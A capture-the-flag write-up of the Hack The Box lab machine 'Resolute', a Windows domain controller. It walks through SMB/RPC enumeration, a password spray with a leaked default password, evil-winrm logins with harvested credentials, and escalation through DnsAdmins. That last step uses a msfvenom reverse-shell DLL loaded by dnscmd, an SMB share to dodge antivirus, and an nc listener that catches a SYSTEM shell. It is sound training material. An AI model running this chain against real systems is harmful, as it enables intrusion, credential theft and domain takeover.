Skip to content



Time for the typical Nmap scan!

└─$ sudo nmap --min-rate 1500 -p-
Starting Nmap 7.93 ( ) at 2022-11-21 07:54 EST
Nmap scan report for
Host is up (0.050s latency).
Not shown: 65511 closed tcp ports (reset)
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49682/tcp open  unknown
49923/tcp open  unknown
60062/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds
└─$ sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001
Starting Nmap 7.93 ( ) at 2022-11-21 08:02 EST
Nmap scan report for
Host is up (0.050s latency).

53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-21 13:09:16Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h47m05s, deviation: 4h37m10s, median: 7m03s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2022-11-21T05:09:26-08:00
| smb2-time: 
|   date: 2022-11-21T13:09:25
|_  start_date: 2022-11-20T20:49:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.79 seconds

We have a Windows machine that looks like a domain controller. We have some domain information like the name of the domain: megabank.local which could be important if we want to login. I added it to my hosts file.

I will try to enumerate SMB first and then we could check MSRPC before trying to attack Kerberos.


Using enum4linux I was able to get information about existing users and groups. I just let the relevant information here:

 ================================( Getting domain SID for )================================

Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436

[+] Host is part of a domain (not a workgroup)

 =======================================( Users on )=======================================

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

 ============================( Password Policy Information for )============================

[+] Attaching to using a NULL share

[+] Trying protocol 139/SMB...

    [!] Protocol failed: Cannot request session (Called Name:

[+] Trying protocol 445/SMB...

[+] Found domain(s):

    [+] MEGABANK
    [+] Builtin

[+] Password Info for Domain: MEGABANK

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: Not Set
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7

 =======================================( Groups on )=======================================

[+] Getting builtin groups:

group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]

[+]  Getting domain group memberships:

Group: 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group: 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Group: 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$
Group: 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group: 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group: 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group: 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group: 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group: 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group: 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group: 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group: 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group: 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group: 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group: 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group: 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group: 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group: 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group: 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group: 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group: 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group: 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group: 'Domain Users' (RID: 513) has member: MEGABANK\per
Group: 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group: 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group: 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group: 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group: 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Group: 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group: 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group: 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator

 ==================( Users on via RID cycling (RIDS: 500-550,1000-1050) )==================

There is no shares we can access so time to move on to MSRPC and see what we can see there. We have a list of users RIDs so maybe we can enumerate them.


Using rpcclient -U '' -N I was able to connect to the service and start querying information. I started by checking each user and after a while I got something insteresting when checking the user marko:

rpcclient $> queryuser 0x457
    User Name   :   marko
    Full Name   :   Marko Novak
    Home Drive  :   
    Dir Drive   :   
    Profile Path:   
    Logon Script:   
    Description :   Account created. Password set to Welcome123!
    Comment     :   
    Remote Dial :
    Logon Time               :  Wed, 31 Dec 1969 19:00:00 EST
    Logoff Time              :  Wed, 31 Dec 1969 19:00:00 EST
    Kickoff Time             :  Wed, 13 Sep 30828 22:48:05 EDT
    Password last set Time   :  Fri, 27 Sep 2019 09:17:15 EDT
    Password can change Time :  Sat, 28 Sep 2019 09:17:15 EDT
    Password must change Time:  Wed, 13 Sep 30828 22:48:05 EDT
    user_rid :  0x457
    group_rid:  0x201
    acb_info :  0x00000210
    fields_present: 0x00ffffff
    logon_divs: 168
    bad_password_count: 0x00000000
    logon_count:    0x00000000

In the description I found what looks like a default password for new accounts: Welcome123!. I tried the password with crackmapexec but no luck, the thing is that maybe another user use this password.

Password spray attack

I will try to spray the found password through all the users in the domain and pray:

└─$ crackmapexec winrm -u /home/kali/Documents/HTB/Resolute/users.txt -p 'Welcome123!' -d MEGABANK
HTTP    5985     [*]
WINRM    5985     [-] MEGABANK\Administrator:Welcome123!
WINRM    5985     [-] MEGABANK\Guest:Welcome123!
WINRM    5985     [-] MEGABANK\krbtgt:Welcome123!
WINRM    5985     [-] MEGABANK\DefaultAccount:Welcome123!
WINRM    5985     [-] MEGABANK\ryan:Welcome123!
WINRM    5985     [-] MEGABANK\marko:Welcome123!
WINRM    5985     [-] MEGABANK\sunita:Welcome123!
WINRM    5985     [-] MEGABANK\abigail:Welcome123!
WINRM    5985     [-] MEGABANK\marcus:Welcome123!
WINRM    5985     [-] MEGABANK\sally:Welcome123!
WINRM    5985     [-] MEGABANK\fred:Welcome123!
WINRM    5985     [-] MEGABANK\angela:Welcome123!
WINRM    5985     [-] MEGABANK\felicia:Welcome123!
WINRM    5985     [-] MEGABANK\gustavo:Welcome123!
WINRM    5985     [-] MEGABANK\ulf:Welcome123!
WINRM    5985     [-] MEGABANK\stevie:Welcome123!
WINRM    5985     [-] MEGABANK\claire:Welcome123!
WINRM    5985     [-] MEGABANK\paulo:Welcome123!
WINRM    5985     [-] MEGABANK\steve:Welcome123!
WINRM    5985     [-] MEGABANK\annette:Welcome123!
WINRM    5985     [-] MEGABANK\annika:Welcome123!
WINRM    5985     [-] MEGABANK\per:Welcome123!
WINRM    5985     [-] MEGABANK\claude:Welcome123!
WINRM    5985     [+] MEGABANK\melanie:Welcome123! (Pwn3d!)

Cool! We should be able to get a shell to the machine as melanie using evil-winrm.

Privilege escalation to ryan

Just using evil-winrm we can login to the victim host and get a shell. You can get the user flag from the Desktop directory.

└─$ evil-winrm -i -u melanie -p 'Welcome123!'     

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents>

At this point I started looking around and I found a hidden directory called PSTranscripts:

*Evil-WinRM* PS C:\> ls -force

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-       11/20/2022   2:14 PM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-----       11/20/2022   2:12 PM                temp
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-       11/20/2022  12:48 PM      402653184 pagefile.sys

Inside it, I found what looks like a Powershell session transcript from ryan. Inside it we can find its credentials!

cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

Now we can connect as ryan by also using evil-winrm.

Time to pwn this

The first thing I found is this:

*Evil-WinRM* PS C:\Users\ryan\Desktop> cat note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Looks like the change we make to the machine are reverted every minute, good to know. Next, I checked the accound privileges:

*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami -all


User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

What I noticed is that the user is part of MEGABANK\DnsAdmins, googling a bit I found something we can use.

Basically, we should be able to inject a custom DLL into the DNS service. After that, we should restart the service and the DLL code will run with high privileges. Let's generate the payload:

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=3333 -f dll> dns.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 8704 bytes

To pass the file to the target, I will use a SMB server with Samba. The box looks like has an AV in place so using this method I can easily share the DLL through the network without touching the disk (Avoiding the AV).

Time to get all working, I started a Netcat listener and then injected the DLL and restarted the service:

*Evil-WinRM* PS C:\Users\ryan\Documents> cmd /c "dnscmd.exe resolute.megabank.local /config /serverlevelplugindll \\\public\dns.dll & sc stop dns & sc start dns"

As you can see we get a shell as nt authority\system and we can finally get the flag!

└─$ rlwrap nc -lnvp 3333
listening on [any] 3333 ...
connect to [] from (UNKNOWN) [] 50214
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

nt authority\system